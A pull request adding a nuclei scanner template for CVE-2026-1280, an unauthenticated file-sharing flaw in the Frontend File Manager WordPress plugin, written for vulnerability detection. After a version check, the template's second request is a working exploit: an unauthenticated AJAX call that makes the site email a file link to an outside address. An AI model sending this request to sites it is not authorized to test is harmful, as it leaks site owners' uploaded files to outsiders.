### PR TITLE
Add CVE-2026-1280 Frontend File Manager template

### DIFF
--- a/http/cves/2026/CVE-2026-1280.yaml
+++ b/http/cves/2026/CVE-2026-1280.yaml
@@ -1,0 +1,82 @@
+id: CVE-2026-1280
+
+info:
+  name: Frontend File Manager Plugin <= 23.5 - Missing Authorization to Unauthenticated Arbitrary File Sharing via File ID
+  author: iamatownboy
+  severity: medium
+  description: |
+    The Frontend File Manager Plugin for WordPress is vulnerable to unauthorized file sharing due to a missing capability check on the wpfm_send_file_in_email AJAX action.
+    This makes it possible for unauthenticated attackers to share arbitrary uploaded files via email by supplying a file ID.
+  impact: |
+    Unauthenticated attackers can exfiltrate uploaded files by triggering the plugin to send file download links to attacker-controlled addresses.
+  remediation: |
+    Update Frontend File Manager Plugin to version 23.6 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1280
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e739e7d3-756a-4c93-9ca7-f7b9f9657033?source=cve
+    - https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.5/inc/callback-functions.php#L98
+    - https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/trunk/inc/callback-functions.php#L98
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-1280
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: najeebmedia
+    product: frontend_file_manager_plugin
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/nmedia-user-file-uploader/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,nmedia-user-file-uploader,frontend-file-manager,unauth,file-sharing,ajax
+
+variables:
+  email_user: "{{rand_text_alpha(8)}}"
+  email_domain: "{{rand_text_alpha(6)}}.example"
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/nmedia-user-file-uploader/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "Frontend File Manager")
+          - compare_versions(version, "<= 23.5")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/
+
+        action=wpfm_send_file_in_email&file_id=1&emailaddress={{email_user}}@{{email_domain}}&message={{rand_text_alpha(12)}}
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "sent"
+          - "mail"
+      - type: status
+        status:
+          - 200
+# digest: 4a0a00473045022100a55a5d8de9c15d7c5ed64f88c4b8afc0a1b52d6d6ff8f93b3f3e3b7e6b9f6f3c02206d65e47893d6f5a6bfad890f42f8dd5ed9f56e4f4e8d54ecff3c21e9f2ca1d6d:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### PR Information

This PR adds a nuclei template for CVE-2026-1280 affecting the Frontend File Manager Plugin for WordPress.

The issue allows unauthenticated users to abuse the file-sharing flow and trigger email delivery of file links using attacker-controlled input.

References:
- NVD
- Wordfence
- Frontend File Manager plugin source code

### Template validation

- Validated with `nuclei -validate` in Docker

### Additional Details

- This PR contains a single template file only